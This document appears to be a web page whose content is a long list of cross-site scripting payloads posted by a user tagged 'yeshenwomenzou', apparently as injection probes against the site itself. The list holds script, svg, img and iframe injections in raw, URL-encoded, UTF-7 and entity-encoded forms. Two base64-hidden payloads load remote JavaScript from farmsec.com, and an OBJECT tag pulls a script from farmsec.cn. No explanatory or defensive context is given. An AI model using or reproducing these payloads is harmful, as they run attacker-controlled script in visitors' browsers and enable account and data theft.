test

[yeshenwomenzou]

"/><svG x=">" onload=(co\u006efirm)``> "/> "> '"> "> "><img src=x onerror=alert('XSS');> '"> "> "><svg/onload=alert(/XSS/) "><svg/onload=alert(String.fromCharCode(88,83,83))>

[yeshenwomenzou]

£¢>

£¢>

£¢>

[yeshenwomenzou]

£¢>

[yeshenwomenzou]

%3cHEAD%3e%3cMETA%20HTTP-EQUIV%3d%22CONTENT-TYPE%22%20CONTENT%3d%22text%2fhtml%3b%20charset%3dUTF-7%22%3e%20%3c%2fHEAD%3e%2bADw-SCRIPT%2bAD4-alert('XSS')%3b%2bADw-%2fSCRIPT%2bAD4-

[yeshenwomenzou]

javascript%3a%2f%2a--%3e%3c%2ftitle%3e%3c%2fstyle%3e%3c%2ftextarea%3e%3c%2fscript%3e%3c%2fxmp%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b%2fonmouseover%3d1%2f%2b%2f[%2a%2f[]%2f%2balert(1)%2f%2f'%3e

[yeshenwomenzou]

%22%2f%3e%3c%2fsCript%3e%3csvG%20x%3d%22%3e%22%20onload%3d(co%5cu006efirm)%60%60%3e

[yeshenwomenzou]

%3cOBJECT%20TYPE%3d%22text%2fx-scriptlet%22%20DATA%3d%22http%3a%2f%2fwww%2efarmsec%2ecn%2fxss%2ejs%22%3e%3c%2fOBJECT%3e

[yeshenwomenzou]

%22%2f%3e%3csvg%20onload%3dalert(1)%3e

[yeshenwomenzou]

%22%3e%3ciframe%20src%3d%22javascript%3aalert(XSS)%22%3e

[yeshenwomenzou]

%22%3e%3c%2fSCRIPT%3e%3e%3e%3cSCRIPT%3ealert(String%2efromCharCode(88,83,83))%3c%2fSCRIPT%3e

[yeshenwomenzou]

%22%3e%3cimg%20src%3d%22x%3ax%22%20onerror%3d%22alert(XSS)%22%3e

[yeshenwomenzou]

'%22%3e%3cimg%20src%3dx%20id%3ddmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZmFybXNlYy5jb20vMTExIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOwoK%20onerror%3deval(atob(this%2eid))%3e

[yeshenwomenzou]

%22%3e%3cimg%20src%3dx%20onerror%3dalert(String%2efromCharCode(88,83,83))%3b%3e

[yeshenwomenzou]

%22%3e%3cimg%20src%3dx%20onerror%3dalert('XSS')%3b%3e

[yeshenwomenzou]

%22%3e%3cscript%3ealert(String%2efromCharCode(88,83,83))%3c%2fscript%3e

[yeshenwomenzou]

%22%3e%3csvg%2fonload%3dalert(%2fXSS%2f)

[yeshenwomenzou]

'%22%3e%3cinput%20onfocus%3deval(atob(this%2eid))%20id%3ddmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZmFybXNlYy5jb20vMTExIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOwoK%20autofocus%3e

[yeshenwomenzou]

%22%3e%3csvg%2fonload%3dalert(String%2efromCharCode(88,83,83))%3e

[yeshenwomenzou]

0000108%26#0000101%26#0000114%26#0000116%26#0000040%26#0000039%26#0000088%26#0000083%26#0000083%26#0000039%26#0000041%3e

[yeshenwomenzou]

$%7balert%601%60%7d%60%3c%2fscript%3e

[yeshenwomenzou]

%22alert(1)%22%20instanceof%20[]%3b%3c%2fscript%3e

[yeshenwomenzou]

%22accesskey%3d%22X%22%20onclick%3d%22alert%600%60%22

[yeshenwomenzou]

%27%22aaa%3e%3clink%20rel%3d%22xxe%20import%20xxx%22%20href%3d%22%2f%2fbaidu%2ecom%2ftest%2esvg%22%3e%3cimg%20src%3dx%3e

[yeshenwomenzou]

%26#39%3b%26#88%3b%26#83%3b%26#83%3b%26#39%3b%26#41%3b%3e

[yeshenwomenzou]

(%7bget[alert(2)]()%7b%7d%7d)%3b

[yeshenwomenzou]

(%7bsetalert(3)%7b%7d%7d)%3b

[yeshenwomenzou]

(%7b[alert(1)]()%7b%7d%7d)%3b

[yeshenwomenzou]

%2f%2f--%3e%3c%2fSCRIPT%3e%22%3e'%3e%3cSCRIPT%3ealert(String%2efromCharCode(88,83,83))%3c%2fSCRIPT%3e

[yeshenwomenzou]

''%3b!--%22%3cXSS%3e%3d%26%7b()%7d

[yeshenwomenzou]

'%3balert(String%2efromCharCode(88,83,83))%2f%2f%5c'%3balert(String%2efromCharCode(88,83,83))%2f%2f%22%3balert(String%2efromCharCode(88,83,83))%2f%2f%5c%22%3balert(String%2efromCharCode%3cscript%3ealert('xss')%3c%2fscript%3e

[yeshenwomenzou]

%3f%22%3e%3c%2fscript%3e%3cbase%20c%3D%3dhref%3Dhttps%3a%5cmysite%3e

[yeshenwomenzou]

%3fscript%3falert(%3f%3fXSS%3f%3f)%3f%2fscript%3f

[yeshenwomenzou]

[yeshenwomenzou]

javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>

[yeshenwomenzou]

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

[yeshenwomenzou]

"/><svG x=">" onload=(co\u006efirm)``>

[yeshenwomenzou]

"/>

[yeshenwomenzou]

">>>

[yeshenwomenzou]

">